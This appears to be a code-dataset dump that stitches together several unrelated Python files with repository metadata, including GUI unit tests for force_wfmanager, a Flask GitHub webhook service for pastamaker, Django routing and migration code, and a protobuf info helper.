def test_bad_station(cursor):
    """Test what happens when we have an unknown station."""
    # Pin "now", then mangle the AFOS id so the station lookup fails.
    pywwa.CTX.utcnow = utc(2015, 6, 9, 6, 51)
    raw = get_example_file("CLI.txt").replace("CLIFGF", "CLIXXX")
    result = cli_parser.processor(cursor, raw)
    assert result is not None
| 0
| 0
| 0
|
0711d2b2079f706e4f95d3bb4d7821e8f97ba680
| 354
|
py
|
Python
|
src/modules/services/interfaces/health.py
|
periket2000/zookeeperize
|
3e72337643b60984b3ad8c206088ea6ea18b0206
|
[
"Apache-2.0"
] | null | null | null |
src/modules/services/interfaces/health.py
|
periket2000/zookeeperize
|
3e72337643b60984b3ad8c206088ea6ea18b0206
|
[
"Apache-2.0"
] | null | null | null |
src/modules/services/interfaces/health.py
|
periket2000/zookeeperize
|
3e72337643b60984b3ad8c206088ea6ea18b0206
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Metaclass as interface for the health service
"""
from abc import ABCMeta, abstractmethod
| 19.666667
| 45
| 0.621469
|
# -*- coding: utf-8 -*-
"""
Metaclass as interface for the health service
"""
from abc import ABCMeta, abstractmethod
class HealthInterface(metaclass=ABCMeta):
    """Abstract interface every health-service implementation must satisfy."""
    @abstractmethod
    def process(self, salute=None):
        """
        Handle a health-check request.

        :salute: optional greeting/payload sent to the system
        :return: Json response describing service health
        """
        pass
| 0
| 211
| 23
|
05a56b2d9163eb6470a1531a5bcf0049c9a4bd4b
| 173
|
py
|
Python
|
course_api/routing.py
|
dragonbone81/bobcat-courses-backend
|
d0f98b837f37eb16a89a24ce9bd3f3f0fd52064c
|
[
"MIT"
] | 3
|
2018-10-25T12:41:33.000Z
|
2019-09-19T19:47:39.000Z
|
course_api/routing.py
|
dragonbone81/bobcat-courses-backend
|
d0f98b837f37eb16a89a24ce9bd3f3f0fd52064c
|
[
"MIT"
] | 22
|
2018-04-01T02:43:01.000Z
|
2022-03-11T23:15:55.000Z
|
course_api/routing.py
|
dragonbone81/cse120
|
d0f98b837f37eb16a89a24ce9bd3f3f0fd52064c
|
[
"MIT"
] | 1
|
2019-09-19T19:48:59.000Z
|
2019-09-19T19:48:59.000Z
|
# chat/routing.py
from django.conf.urls import url
from . import consumers
# Websocket URL routes consumed by Channels; single notifications endpoint.
websocket_urlpatterns = [
    url(r'^api/ws/notifications', consumers.NotificationsConsumer),
]
| 19.222222
| 67
| 0.763006
|
# chat/routing.py
from django.conf.urls import url
from . import consumers
# Websocket URL routes consumed by Channels; single notifications endpoint.
websocket_urlpatterns = [
    url(r'^api/ws/notifications', consumers.NotificationsConsumer),
]
| 0
| 0
| 0
|
609b8d6d6afdd31120e91ceaa06afaea06a3515a
| 14,668
|
py
|
Python
|
force_wfmanager/tests/test_wfmanager_tasks.py
|
force-h2020/force-wfmanager
|
bcd488cd37092cacd9d0c81b544ee8c1654d1d92
|
[
"BSD-2-Clause"
] | 1
|
2019-08-19T16:02:20.000Z
|
2019-08-19T16:02:20.000Z
|
force_wfmanager/tests/test_wfmanager_tasks.py
|
force-h2020/force-wfmanager
|
bcd488cd37092cacd9d0c81b544ee8c1654d1d92
|
[
"BSD-2-Clause"
] | 396
|
2017-07-18T15:19:55.000Z
|
2021-05-03T06:23:06.000Z
|
force_wfmanager/tests/test_wfmanager_tasks.py
|
force-h2020/force-wfmanager
|
bcd488cd37092cacd9d0c81b544ee8c1654d1d92
|
[
"BSD-2-Clause"
] | 2
|
2019-03-05T16:23:10.000Z
|
2020-04-16T08:59:11.000Z
|
# (C) Copyright 2010-2020 Enthought, Inc., Austin, TX
# All rights reserved.
import copy
from unittest import mock, TestCase
from pyface.api import OK, CANCEL
from pyface.file_dialog import FileDialog
from pyface.ui.qt4.util.gui_test_assistant import GuiTestAssistant
from pyface.tasks.api import TaskWindow
from force_bdss.tests.probe_classes.factory_registry import (
ProbeFactoryRegistry,
)
from force_bdss.api import Workflow
from force_wfmanager.tests.dummy_classes.dummy_contributed_ui import (
DummyContributedUI,
)
from force_wfmanager.ui.review.data_view_pane import DataViewPane
from force_wfmanager.ui.setup.setup_pane import SetupPane
from force_wfmanager.ui.setup.side_pane import SidePane
from force_wfmanager.ui.review.results_pane import ResultsPane
from force_wfmanager.model.analysis_model import AnalysisModel
from .mock_methods import mock_file_writer, mock_dialog, mock_return_args
from force_wfmanager.tests.dummy_classes.dummy_wfmanager import DummyWfManager
from force_wfmanager.wfmanager_review_task import WfManagerReviewTask
from force_wfmanager.wfmanager_setup_task import WfManagerSetupTask
FILE_DIALOG_PATH = "force_wfmanager.wfmanager_setup_task.FileDialog"
RESULTS_FILE_DIALOG_PATH = "force_wfmanager.wfmanager_review_task.FileDialog"
RESULTS_FILE_OPEN_PATH = "force_wfmanager.io.project_io.open"
RESULTS_JSON_DUMP_PATH = "force_wfmanager.io.project_io.json.dump"
RESULTS_JSON_LOAD_PATH = "force_wfmanager.io.project_io.json.load"
RESULTS_WRITER_PATH = (
"force_wfmanager.io.project_io.WorkflowWriter.get_workflow_data"
)
RESULTS_READER_PATH = "force_wfmanager.io.project_io.WorkflowReader"
RESULTS_ERROR_PATH = "force_wfmanager.wfmanager_review_task.error"
ANALYSIS_WRITE_PATH = (
"force_wfmanager.io.analysis_model_io.write_analysis_model"
)
ANALYSIS_FILE_OPEN_PATH = "force_wfmanager.model.analysis_model.open"
| 37.804124
| 79
| 0.650123
|
# (C) Copyright 2010-2020 Enthought, Inc., Austin, TX
# All rights reserved.
import copy
from unittest import mock, TestCase
from pyface.api import OK, CANCEL
from pyface.file_dialog import FileDialog
from pyface.ui.qt4.util.gui_test_assistant import GuiTestAssistant
from pyface.tasks.api import TaskWindow
from force_bdss.tests.probe_classes.factory_registry import (
ProbeFactoryRegistry,
)
from force_bdss.api import Workflow
from force_wfmanager.tests.dummy_classes.dummy_contributed_ui import (
DummyContributedUI,
)
from force_wfmanager.ui.review.data_view_pane import DataViewPane
from force_wfmanager.ui.setup.setup_pane import SetupPane
from force_wfmanager.ui.setup.side_pane import SidePane
from force_wfmanager.ui.review.results_pane import ResultsPane
from force_wfmanager.model.analysis_model import AnalysisModel
from .mock_methods import mock_file_writer, mock_dialog, mock_return_args
from force_wfmanager.tests.dummy_classes.dummy_wfmanager import DummyWfManager
from force_wfmanager.wfmanager_review_task import WfManagerReviewTask
from force_wfmanager.wfmanager_setup_task import WfManagerSetupTask
FILE_DIALOG_PATH = "force_wfmanager.wfmanager_setup_task.FileDialog"
RESULTS_FILE_DIALOG_PATH = "force_wfmanager.wfmanager_review_task.FileDialog"
RESULTS_FILE_OPEN_PATH = "force_wfmanager.io.project_io.open"
RESULTS_JSON_DUMP_PATH = "force_wfmanager.io.project_io.json.dump"
RESULTS_JSON_LOAD_PATH = "force_wfmanager.io.project_io.json.load"
RESULTS_WRITER_PATH = (
"force_wfmanager.io.project_io.WorkflowWriter.get_workflow_data"
)
RESULTS_READER_PATH = "force_wfmanager.io.project_io.WorkflowReader"
RESULTS_ERROR_PATH = "force_wfmanager.wfmanager_review_task.error"
ANALYSIS_WRITE_PATH = (
"force_wfmanager.io.analysis_model_io.write_analysis_model"
)
ANALYSIS_FILE_OPEN_PATH = "force_wfmanager.model.analysis_model.open"
def get_probe_wfmanager_tasks(wf_manager=None, contributed_uis=None):
# Returns the Setup and Review Tasks, with a mock TaskWindow and dummy
# Application which does not have an event loop.
if wf_manager is None:
wf_manager = DummyWfManager()
analysis_model = AnalysisModel()
workflow_model = Workflow()
factory_registry_plugin = ProbeFactoryRegistry()
if contributed_uis is None:
contributed_uis = [DummyContributedUI()]
wf_manager.factory_registry = factory_registry_plugin
setup_test = WfManagerSetupTask(
analysis_model=analysis_model,
workflow_model=workflow_model,
factory_registry=factory_registry_plugin,
contributed_uis=contributed_uis,
)
review_task = WfManagerReviewTask(
analysis_model=analysis_model,
workflow_model=workflow_model,
factory_registry=factory_registry_plugin,
)
tasks = [setup_test, review_task]
mock_window = mock.Mock(spec=TaskWindow)
mock_window.tasks = tasks
mock_window.application = wf_manager
for task in tasks:
task.window = mock_window
task.create_central_pane()
# A Task's central pane is generally aware of its task in normal
# operations, but it doesn't seem to be so in this mock situation;
# so we "make" it aware.
if hasattr(task, "central_pane") and task.central_pane is not None:
task.central_pane.task = task
task.create_dock_panes()
return tasks[0], tasks[1]
def return_workflow(file_path):
return Workflow()
class TestWFManagerTasks(GuiTestAssistant, TestCase):
def setUp(self):
super(TestWFManagerTasks, self).setUp()
self.setup_task, self.review_task = get_probe_wfmanager_tasks()
def test_init(self):
self.assertIsInstance(self.setup_task.create_central_pane(), SetupPane)
self.assertEqual(len(self.setup_task.create_dock_panes()), 1)
self.assertIsInstance(self.setup_task.side_pane, SidePane)
self.assertEqual(len(self.review_task.create_dock_panes()), 1)
self.assertIsInstance(self.review_task.side_pane, ResultsPane)
self.assertIsInstance(
self.review_task.create_central_pane(), DataViewPane
)
self.assertIsInstance(self.review_task.workflow_model, Workflow)
self.assertIsInstance(self.setup_task.workflow_model, Workflow)
self.assertIsInstance(self.review_task.analysis_model, AnalysisModel)
self.assertIsInstance(self.setup_task.analysis_model, AnalysisModel)
def test_save_analysis(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
):
mock_file_dialog.side_effect = mock_dialog(
FileDialog, OK, "test_file.json"
)
self.review_task.analysis_model._export_enabled = True
self.assertTrue(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertTrue(mock_open.called)
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
):
mock_file_dialog.side_effect = mock_dialog(
FileDialog, OK, "test_file.csv"
)
self.assertTrue(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertTrue(mock_open.called)
def test_save_analysis_failure(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, CANCEL)
self.assertFalse(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertFalse(mock_open.called)
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
), mock.patch(
RESULTS_ERROR_PATH
) as mock_error:
mock_error.side_effect = mock_return_args
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK, "")
self.review_task.analysis_model._export_enabled = True
self.assertFalse(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertFalse(mock_open.called)
mock_error.assert_called_with(
None,
(
"Cannot save in the requested file:\n\n"
"AnalysisModel can only write to .json or .csv formats."
),
"Error when saving the results table",
)
mock_open = mock.mock_open()
mock_open.side_effect = RuntimeError("OUPS")
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
ANALYSIS_FILE_OPEN_PATH, mock_open, create=False
), mock.patch(
RESULTS_ERROR_PATH
) as mock_error:
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK, "f.csv")
self.assertFalse(self.review_task.export_analysis_model_as())
self.assertTrue(mock_file_dialog.called)
self.assertTrue(mock_open.called)
mock_error.assert_called_with(
None,
"Cannot save the results table:\n\nOUPS",
"Error when saving results",
)
def test_save_project(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_JSON_DUMP_PATH
) as mock_json_dump, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
), mock.patch(
RESULTS_WRITER_PATH
) as mock_wf_writer:
mock_file_dialog.side_effect = mock_dialog(
FileDialog, OK, "file_path"
)
mock_wf_writer.side_effect = mock_file_writer
self.review_task.save_project_as()
self.assertTrue(mock_wf_writer.called)
self.assertTrue(mock_open.called)
self.assertTrue(mock_json_dump.called)
self.assertTrue(mock_file_dialog.called)
def test_save_project_failure(self):
mock_open = mock.mock_open()
mock_open.side_effect = IOError("OUPS")
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
), mock.patch(
RESULTS_ERROR_PATH
) as mock_error:
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
mock_error.side_effect = mock_return_args
self.review_task.save_project_as()
self.assertTrue(mock_open.called)
mock_error.assert_called_with(
None,
"Cannot save in the requested file:\n\nOUPS",
"Error when saving the project",
)
def test_open_project(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_JSON_LOAD_PATH
) as mock_json, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
mock_json.return_value = {
"analysis_model": {
"header": ["x", "y"],
"1": {'data': [1, 2],
'metadata': {'a': 7}}
},
"version": "1",
"workflow": {},
}
# the workflow gets updated to a new Workflow object
old_workflow = self.review_task.workflow_model
# but the analysis model gets updated in-place
old_analysis = copy.deepcopy(self.review_task.analysis_model)
self.assertEqual(old_workflow, self.setup_task.workflow_model)
with mock.patch(
"force_bdss.io.workflow_reader.WorkflowReader.read"
) as mock_read:
mock_read.side_effect = return_workflow
self.review_task.open_project()
self.assertTrue(mock_open.called)
self.assertTrue(mock_json.called)
self.assertNotEqual(old_workflow, self.review_task.workflow_model)
self.assertNotEqual(
self.setup_task.workflow_model, self.review_task.workflow_model
)
self.assertNotEqual(old_workflow, self.setup_task.workflow_model)
self.assertNotEqual(
old_workflow, self.setup_task.side_pane.workflow_tree.model
)
self.assertNotEqual(
old_analysis.header, self.review_task.analysis_model.header
)
self.assertNotEqual(
old_analysis.header, self.setup_task.analysis_model.header
)
self.assertEqual(
("x", "y"), self.review_task.analysis_model.header
)
self.assertEqual(
[(1, 2)], self.review_task.analysis_model.evaluation_steps,
)
self.assertEqual(
[{'a': 7}], self.review_task.analysis_model.step_metadata
)
self.assertEqual(
self.setup_task.analysis_model.header,
self.review_task.analysis_model.header,
)
self.assertEqual(
self.setup_task.analysis_model.evaluation_steps,
self.review_task.analysis_model.evaluation_steps,
)
def test_open_empty_analysis_model(self):
mock_open = mock.mock_open()
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_JSON_LOAD_PATH
) as mock_json, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
mock_json.return_value = {"version": "1", "workflow": {}}
old_workflow = self.review_task.workflow_model
with mock.patch(
"force_bdss.io.workflow_reader.WorkflowReader.read"
) as mock_read:
mock_read.side_effect = return_workflow
self.review_task.open_project()
self.assertTrue(mock_open.called)
self.assertTrue(mock_json.called)
self.assertIsNot(old_workflow, self.review_task.workflow_model)
self.assertIsNot(
self.setup_task.workflow_model, self.review_task.workflow_model
)
self.assertEqual(tuple(), self.review_task.analysis_model.header)
self.assertEqual(
[], self.review_task.analysis_model.evaluation_steps
)
def test_open_project_failure(self):
mock_open = mock.mock_open()
mock_open.side_effect = IOError("OUPS")
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(RESULTS_ERROR_PATH) as mock_error:
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
self.assertFalse(self.review_task.open_project())
error_msg = (
"Unable to load file:\n\n[Errno 2] "
"No such file or directory: ''"
)
mock_error.assert_called_with(
None, error_msg, "Error when loading project"
)
mock_open = mock.mock_open()
error = ValueError("some wrong value")
mock_open.side_effect = error
with mock.patch(
RESULTS_FILE_DIALOG_PATH
) as mock_file_dialog, mock.patch(
RESULTS_ERROR_PATH
) as mock_error, mock.patch(
RESULTS_FILE_OPEN_PATH, mock_open, create=True
):
mock_file_dialog.side_effect = mock_dialog(FileDialog, OK)
self.assertFalse(self.review_task.open_project())
error_msg = f"Unable to load project:\n\n{error}"
mock_error.assert_called_with(
None, error_msg, "Error when loading project"
)
| 12,452
| 32
| 311
|
795b0560d2ca479481ca8ceaeb887fd7b5cba2be
| 9,784
|
py
|
Python
|
pastamaker/web.py
|
sileht/pastamaker
|
1fda2bfc0dcaa15cb1070cb8bb7c1c74fda424fc
|
[
"Apache-2.0"
] | 37
|
2017-07-10T10:29:52.000Z
|
2019-05-09T01:50:41.000Z
|
pastamaker/web.py
|
sileht/pastamaker
|
1fda2bfc0dcaa15cb1070cb8bb7c1c74fda424fc
|
[
"Apache-2.0"
] | 13
|
2017-06-13T08:01:30.000Z
|
2018-01-30T12:00:59.000Z
|
pastamaker/web.py
|
sileht/pastamaker
|
1fda2bfc0dcaa15cb1070cb8bb7c1c74fda424fc
|
[
"Apache-2.0"
] | 4
|
2017-07-05T15:04:09.000Z
|
2017-12-16T20:05:46.000Z
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NOTE(sileht): usefull for gunicon, not really for uwsgi
# import gevent
# import gevent.monkey
# gevent.monkey.patch_all()
import hmac
import logging
import os
import flask
import github
import lz4.block
import requests
import rq
import rq_dashboard
import ujson
from pastamaker import config
from pastamaker import utils
from pastamaker import worker
LOG = logging.getLogger(__name__)
app = flask.Flask(__name__)
app.config.from_object(rq_dashboard.default_settings)
app.register_blueprint(rq_dashboard.blueprint, url_prefix="/rq")
app.config["REDIS_URL"] = utils.get_redis_url()
app.config["RQ_POLL_INTERVAL"] = 10000 # ms
@app.route("/auth", methods=["GET"])
@app.route("/refresh/<owner>/<repo>/<path:refresh_ref>",
methods=["POST"])
@app.route("/refresh", methods=["POST"])
@app.route("/queue/<owner>/<repo>/<path:branch>")
@app.route("/status")
@app.route('/status/stream')
@app.route("/event", methods=["POST"])
@app.route("/")
@app.route("/favicon.ico")
@app.route("/fonts/<file>")
@app.route("/login")
@app.route("/logged/<installation_id>")
| 30.767296
| 78
| 0.601799
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NOTE(sileht): usefull for gunicon, not really for uwsgi
# import gevent
# import gevent.monkey
# gevent.monkey.patch_all()
import hmac
import logging
import os
import flask
import github
import lz4.block
import requests
import rq
import rq_dashboard
import ujson
from pastamaker import config
from pastamaker import utils
from pastamaker import worker
LOG = logging.getLogger(__name__)
app = flask.Flask(__name__)
app.config.from_object(rq_dashboard.default_settings)
app.register_blueprint(rq_dashboard.blueprint, url_prefix="/rq")
app.config["REDIS_URL"] = utils.get_redis_url()
app.config["RQ_POLL_INTERVAL"] = 10000 # ms
def get_redis():
if not hasattr(flask.g, 'redis'):
conn = utils.get_redis()
flask.g.redis = conn
return flask.g.redis
def get_queue():
if not hasattr(flask.g, 'rq_queue'):
flask.g.rq_queue = rq.Queue(connection=get_redis())
return flask.g.rq_queue
@app.route("/auth", methods=["GET"])
def auth():
return "pastamaker don't need oauth setup"
@app.route("/refresh/<owner>/<repo>/<path:refresh_ref>",
methods=["POST"])
def refresh(owner, repo, refresh_ref):
authentification()
integration = github.GithubIntegration(config.INTEGRATION_ID,
config.PRIVATE_KEY)
installation_id = utils.get_installation_id(integration, owner)
if not installation_id:
flask.abort(404, "%s have not installed pastamaker" % owner)
if refresh_ref == "full":
token = integration.get_access_token(installation_id).token
g = github.Github(token)
r = g.get_repo("%s/%s" % (owner, repo))
pulls = r.get_pulls()
branches = set([p.base.ref for p in pulls])
for branch in branches:
# Mimic the github event format
data = {
'repository': {
'name': repo,
'full_name': '%s/%s' % (owner, repo),
'owner': {'login': owner},
},
'installation': {'id': installation_id},
"refresh_ref": "branch/%s" % branch,
}
get_queue().enqueue(worker.event_handler, "refresh", data)
else:
# Mimic the github event format
data = {
'repository': {
'name': repo,
'full_name': '%s/%s' % (owner, repo),
'owner': {'login': owner},
},
'installation': {'id': installation_id},
"refresh_ref": refresh_ref,
}
get_queue().enqueue(worker.event_handler, "refresh", data)
return "", 202
@app.route("/refresh", methods=["POST"])
def refresh_all():
authentification()
integration = github.GithubIntegration(config.INTEGRATION_ID,
config.PRIVATE_KEY)
counts = [0, 0, 0]
for install in utils.get_installations(integration):
counts[0] += 1
token = integration.get_access_token(install["id"]).token
g = github.Github(token)
i = g.get_installation(install["id"])
for repo in i.get_repos():
counts[1] += 1
pulls = repo.get_pulls()
branches = set([p.base.ref for p in pulls])
# Mimic the github event format
for branch in branches:
counts[2] += 1
get_queue().enqueue(worker.event_handler, "refresh", {
'repository': repo.raw_data,
'installation': {'id': install['id']},
'refresh_ref': "branch/%s" % branch,
})
return ("Updated %s installations, %s repositories, "
"%s branches" % tuple(counts)), 202
@app.route("/queue/<owner>/<repo>/<path:branch>")
def queue(owner, repo, branch):
return get_redis().get("queues~%s~%s~%s" % (owner, repo, branch)) or "[]"
def _get_status(r):
queues = []
for key in r.keys("queues~*~*~*"):
_, owner, repo, branch = key.split("~")
updated_at = None
payload = r.get(key)
if payload:
try:
pulls = ujson.loads(payload)
except Exception:
# Old format
payload = lz4.block.decompress(payload)
pulls = ujson.loads(payload)
updated_at = list(sorted([p["updated_at"] for p in pulls]))[-1]
queues.append({
"owner": owner,
"repo": repo,
"branch": branch,
"pulls": pulls,
"updated_at": updated_at,
})
return ujson.dumps(queues)
@app.route("/status")
def status():
r = get_redis()
return _get_status(r)
def stream_message(_type, data):
return 'event: %s\ndata: %s\n\n' % (_type, data)
def stream_generate():
r = get_redis()
yield stream_message("refresh", _get_status(r))
yield stream_message("rq-refresh", get_queue().count)
pubsub = r.pubsub()
pubsub.subscribe("update")
pubsub.subscribe("rq-update")
while True:
# NOTE(sileht): heroku timeout is 55s, we have set gunicorn timeout to
# 60s, this assume 5s is enough for http and redis round strip and use
# 50s
message = pubsub.get_message(timeout=50.0)
if message is None:
yield stream_message("ping", "{}")
elif message["channel"] == "update":
yield stream_message("refresh", _get_status(r))
yield stream_message("rq-refresh", get_queue().count)
elif message["channel"] == "rq-update":
yield stream_message("rq-refresh", get_queue().count)
@app.route('/status/stream')
def stream():
return flask.Response(flask.stream_with_context(stream_generate()),
mimetype="text/event-stream")
@app.route("/event", methods=["POST"])
def event_handler():
authentification()
event_type = flask.request.headers.get("X-GitHub-Event")
event_id = flask.request.headers.get("X-GitHub-Delivery")
data = flask.request.get_json()
if event_type in ["refresh", "pull_request", "status",
"pull_request_review"]:
get_queue().enqueue(worker.event_handler, event_type, data)
get_redis().publish("rq-update", "noop")
if "repository" in data:
repo_name = data["repository"]["full_name"]
else:
repo_name = data["installation"]["account"]["login"]
LOG.info('[%s/%s] received "%s" event "%s"',
data["installation"]["id"], repo_name,
event_type, event_id)
return "", 202
@app.route("/")
def index():
return app.send_static_file("index.html")
@app.route("/favicon.ico")
def favicon():
return app.send_static_file("favicon.ico")
@app.route("/fonts/<file>")
def fonts(file):
# bootstrap fonts
return flask.send_from_directory(os.path.join("static", "fonts"), file)
def authentification():
# Only SHA1 is supported
header_signature = flask.request.headers.get('X-Hub-Signature')
if header_signature is None:
LOG.warning("Webhook without signature")
flask.abort(403)
try:
sha_name, signature = header_signature.split('=')
except ValueError:
sha_name = None
if sha_name != 'sha1':
LOG.warning("Webhook signature malformed")
flask.abort(403)
mac = utils.compute_hmac(flask.request.data)
if not hmac.compare_digest(mac, str(signature)):
LOG.warning("Webhook signature invalid")
flask.abort(403)
@app.route("/login")
def login():
installation_id = flask.request.args.get('installation_id')
params = {
'client_id': config.OAUTH_CLIENT_ID,
'redirect_uri': "%s/logged/%s" % (config.BASE_URL, installation_id),
'scope': 'repo',
'note': 'Mergify.io PR rebase/merge bot',
'note_url': config.BASE_URL
}
url = "https://github.com/login/oauth/authorize?"
url = url + "&".join("=".join(i) for i in params.items())
return flask.redirect(url, code=302)
@app.route("/logged/<installation_id>")
def logged(installation_id):
code = flask.request.args.get('code')
r = requests.post("https://github.com/login/oauth/access_token",
params=dict(
client_id=config.OAUTH_CLIENT_ID,
client_secret=config.OAUTH_CLIENT_SECRET,
code=code,
), headers={'Accept': 'application/json'})
r.raise_for_status()
token = r.json().get('access_token')
if not token:
return flask.abort(400, 'Invalid callback code')
r = requests.get(
"https://api.github.com/user/installations/%s/repositories" %
installation_id,
headers={"Accept": "application/vnd.github.machine-man-preview+json",
"Authorization": "token %s" % token})
if r.status_code == 403:
return flask.abort(
400, "You don't have the write access on "
"repositories of this %s installation" % config.CONTEXT)
r.raise_for_status()
get_redis().set("installation-token-%s" % installation_id, token)
return "Registration OK"
| 7,672
| 0
| 402
|
3d17e01cc03fb6bd6696eb4b21af15c825c85509
| 426
|
py
|
Python
|
watchlist_app/migrations/0003_alter_streamingplatform_about.py
|
ivanlegranbizarro/movieList
|
eeaa875698da608d8cc009341dd31ee8a26169e9
|
[
"MIT"
] | null | null | null |
watchlist_app/migrations/0003_alter_streamingplatform_about.py
|
ivanlegranbizarro/movieList
|
eeaa875698da608d8cc009341dd31ee8a26169e9
|
[
"MIT"
] | null | null | null |
watchlist_app/migrations/0003_alter_streamingplatform_about.py
|
ivanlegranbizarro/movieList
|
eeaa875698da608d8cc009341dd31ee8a26169e9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.6 on 2021-08-26 06:57
from django.db import migrations, models
| 22.421053
| 74
| 0.622066
|
# Generated by Django 3.2.6 on 2021-08-26 06:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('watchlist_app', '0002_auto_20210826_0852'),
]
operations = [
migrations.AlterField(
model_name='streamingplatform',
name='about',
field=models.CharField(blank=True, max_length=150, null=True),
),
]
| 0
| 312
| 23
|
70f9fa062d8723acc19d16f3f162787ad7e36d88
| 1,465
|
py
|
Python
|
src/spaceone/inventory/info/network_info.py
|
choonho/inventory
|
cc89757490d28fecb7ffccdfd6f89d4c0aa40da5
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/info/network_info.py
|
choonho/inventory
|
cc89757490d28fecb7ffccdfd6f89d4c0aa40da5
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/inventory/info/network_info.py
|
choonho/inventory
|
cc89757490d28fecb7ffccdfd6f89d4c0aa40da5
|
[
"Apache-2.0"
] | null | null | null |
import functools
from spaceone.api.inventory.v1 import network_pb2
from spaceone.core.pygrpc.message_type import *
from spaceone.inventory.model.network_model import Network
from spaceone.inventory.info.zone_info import ZoneInfo
from spaceone.inventory.info.region_info import RegionInfo
__all__ = ['NetworkInfo', 'NetworksInfo']
| 38.552632
| 134
| 0.709898
|
import functools
from spaceone.api.inventory.v1 import network_pb2
from spaceone.core.pygrpc.message_type import *
from spaceone.inventory.model.network_model import Network
from spaceone.inventory.info.zone_info import ZoneInfo
from spaceone.inventory.info.region_info import RegionInfo
__all__ = ['NetworkInfo', 'NetworksInfo']
def NetworkInfo(network_vo: Network, minimal=False):
info = {
'network_id': network_vo.network_id,
'name': network_vo.name,
'reference': network_pb2.NetworkReference(
**network_vo.reference.to_dict()) if network_vo.reference else None
}
if not minimal:
info.update({
'cidr': network_vo.cidr,
'zone_info': ZoneInfo(network_vo.zone, minimal=True),
'region_info': RegionInfo(network_vo.region, minimal=True),
'created_at': change_timestamp_type(network_vo.created_at),
'data': change_struct_type(network_vo.data),
'metadata': change_struct_type(network_vo.metadata),
'tags': change_struct_type(network_vo.tags),
'collection_info': change_struct_type(network_vo.collection_info.to_dict()),
'domain_id': network_vo.domain_id
})
return network_pb2.NetworkInfo(**info)
def NetworksInfo(network_vos, total_count, **kwargs):
return network_pb2.NetworksInfo(results=list(map(functools.partial(NetworkInfo, **kwargs), network_vos)), total_count=total_count)
| 1,085
| 0
| 46
|
1e2c56644b6e59790a6b681324aa7dd41fa8f75d
| 5,210
|
py
|
Python
|
imposer.py
|
kevinjelnl/yapdfi
|
cb88e025cda7b79f4fd9f719f07d0b4ef20787ae
|
[
"MIT"
] | null | null | null |
imposer.py
|
kevinjelnl/yapdfi
|
cb88e025cda7b79f4fd9f719f07d0b4ef20787ae
|
[
"MIT"
] | 3
|
2021-09-08T02:23:46.000Z
|
2022-03-12T00:43:59.000Z
|
imposer.py
|
kevinjelnl/yapdfi
|
cb88e025cda7b79f4fd9f719f07d0b4ef20787ae
|
[
"MIT"
] | null | null | null |
import sys
import logging
import math
from pathlib import Path
from pydantic import BaseModel
from typing import *
import PyPDF2
from reportlab.lib.units import mm, inch
logging.basicConfig(format='%(asctime)s,%(msecs)d | %(levelname)-8s | %(filename)s:%(funcName)s:%(lineno)d - %(message)s',
datefmt='%Y-%m-%d:%H:%M:%S',
level=logging.DEBUG)
log = logging.getLogger(__name__)
pt2mm = 0.3527777778
if __name__ == "__main__":
main()
pass
| 32.767296
| 122
| 0.59405
|
import sys
import logging
import math
from pathlib import Path
from pydantic import BaseModel
from typing import *
